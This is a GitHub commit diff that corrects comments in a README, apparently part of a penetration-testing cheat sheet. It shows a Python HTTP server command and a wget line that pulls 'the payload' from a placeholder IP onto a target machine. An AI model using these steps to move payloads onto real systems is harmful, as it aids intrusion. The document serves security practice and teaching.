Update README.md

This commit is contained in:
Joe Totes
2022-07-30 16:11:47 -04:00
committed by GitHub
parent 89ce055b44
commit 8c4cf37564

View File

@@ -277,8 +277,8 @@ sudo python3 -m http.server {PORT}
# Usage - Download on server machine # Usage - Download on server machine
wget http://{IP ADDRESS}/{FILE} -outfile {FILE} wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
# {IP ADDRESS}: Python Server IP Address from step one # {IP ADDRESS}: IP Address of the client from step one (python server)
# {FILE}: The payload to be trasnfered # {FILE}: The payload to be transferred
``` ```
<br /> <br />